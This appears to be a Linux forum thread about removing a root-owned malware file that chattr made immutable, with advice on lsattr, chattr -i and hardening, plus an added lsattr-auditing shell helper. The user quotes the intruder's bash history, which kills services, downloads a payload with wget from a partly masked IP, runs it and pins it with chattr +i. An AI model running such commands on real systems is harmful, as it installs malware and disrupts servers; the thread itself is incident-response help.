Can't delete or chown file as root

Hello,

Some hack script suddenly appeared in the /root directory of my VPS. Let's call it "badscript".

-rwxr-xr-x 1 root root 1.2M Jul 18 12:34 badscript

But I can't delete it or chown it as root…

it says:

rm: cannot remove `badscript': Operation not permitted
chown: changing ownership of `badscript': Operation not permitted

stat badscript

  File: `badscript'
  Size: 1189151   Blocks: 2336   IO Block: 4096   regular file
Device: 57h/87d   Inode: 17932822   Links: 1
Access: (0755/-rwxr-xr-x)  Uid: (    0/    root)   Gid: (    0/    root)
Access: 2014-07-29 16:51:30.000000000 -0400
Modify: 2014-07-18 12:34:49.000000000 -0400
Change: 2014-07-29 16:51:25.000000000 -0400

Please, any idea how to block the person who added this script to my Linux Red Hat server?

The "last" command shows only my regular IPs, no stranger IP.

And how do I remove that script? Thank you.

I’d change the root password, stat.
The hacker must have it in order to write to that folder

I’d also reboot into single-user mode, in case there is some kind of zero-day privilege escalation bug.
Is the server fully updated?

I changed the root password, and the server has no extra users, only those created during the Apache and MySQL install.
I have a feeling that the server was compromised somehow from the inside, not from outside by someone logging in via SSH; the root password was a safe one.

The script was running like this:
./badscript
/root/badscript

OK, run:

cd /

then check the output from:

lsattr

if you see an “a” in the badscript extended attributes, like this:-

-----a-------e-- ./badscript

it’s flagged as “append only” … so run:

chattr -a badscript

to remove the append only extended attribute flag

Now try deleting it.

[EDIT]

An “i” flag (in the lsattr output) denotes the file is flagged as “immutable” … so remove that with:

chattr -i badscript

or both at the same time with:

chattr -i -a badscript

Info on extended attributes can be found here:
http://www.linuxintheshell.org/2013/04/23/episode-028-extended-attributes-lsattr-and-chattr/
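As an added example (not code from this thread or its author), the following POSIX shell helper parses lsattr-style output and reports every file whose append-only ("a") or immutable ("i") flag would stop even root from deleting or chowning it, printing the exact chattr command that clears the flags; the sample lines, the file names in them and the audit_dir wrapper are my own constructions.

```shell
# Parse lsattr output on stdin ("<flags> <path>" per line) and report files
# carrying the append-only (a) and/or immutable (i) attribute, together with
# the chattr invocation that clears them. Lowercase i and a are exactly the
# immutable and append-only flags in lsattr's flag field; case patterns are
# case-sensitive, so the unrelated uppercase flags are not matched.
audit_lsattr() {
    while read -r attrs path; do
        [ -n "$attrs" ] && [ -n "$path" ] || continue   # skip blank lines
        flags=""
        labels=""
        case "$attrs" in *i*) flags="-i"; labels="immutable" ;; esac
        case "$attrs" in *a*)
            flags="${flags:+$flags }-a"
            labels="${labels:+$labels,}append-only" ;;
        esac
        [ -n "$flags" ] || continue                       # nothing blocking rm/chown
        printf '%s (%s): chattr %s %s\n' "$path" "$labels" "$flags" "$path"
    done
}

# Live use (assumed wrapper): recursively list attributes under a directory.
# lsattr only works on filesystems that support these attributes (ext2/3/4, xfs).
audit_dir() {
    lsattr -R -- "$1" 2>/dev/null | audit_lsattr
}

# Constructed sample mirroring the thread's lsattr lines (flags are invented
# for the purpose of the demo; only ./badscript's "i" matches the thread).
SAMPLE_LSATTR='-----a-------e-- ./badscript
----i---------- ./conf.n
-------------e-- ./sent
----ia-------e-- ./.bash_history'

# Run the audit over the constructed sample and return its report.
demo_audit() {
    printf '%s\n' "$SAMPLE_LSATTR" | audit_lsattr
}

demo_audit
```

Running audit_dir against /root after an incident is a quick way to spot files that were pinned with chattr +i, as the thread's bash history shows the intruder doing.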

Thanks, when I run lsattr it shows:

----i---------- ./badscript

cat /etc/passwd | grep root

root:x:0:0:root:/root:/bin/bash
operator:x:11:0:operator:/root:/sbin/nologin
Also, thanks to the command:
find /root -type f -name "*" -mtime -48

I found some modified files, among them:

/root/sent
/root/badscript
/root/conf.n
/root/.mysql_history
/root/.bash_history

cat /root/.bash_history

uname -a
passwd
ps -
killall -9 httpd
killall -9 pickup
killall -9 qmgr
killall -9 proftpd
killall -9 xinetd
wget http://192.161.*.*:1688/badscript
chmod +x badscript
./badscript
chattr +i badscript
killall -9 sshpa
(I replaced the IP with asterisks)

cat /root/.mysql_history

password
show databases;

Please, any ideas? I already changed the root password, and it's not a guessable one…

See my edit above.

chattr -i badscript

(run as root)

then you should be able to delete it

Yes, thanks, I already eliminated that script thanks to your command.
Please, any other advice regarding the things I posted before?

Any ideas about what ?

Here’s an idea … recover from a known clean backup, then firewall off any SSH ports unless accessed over an openvpn connection authenticated by certificate :wink:

If you could post a copy of “badscript” we could comment more???

Here is the link to VirusTotal.com analysis of the file: http://pastebin.com/mtMshTwR
It's an unreadable file; the code looks like some .exe or something.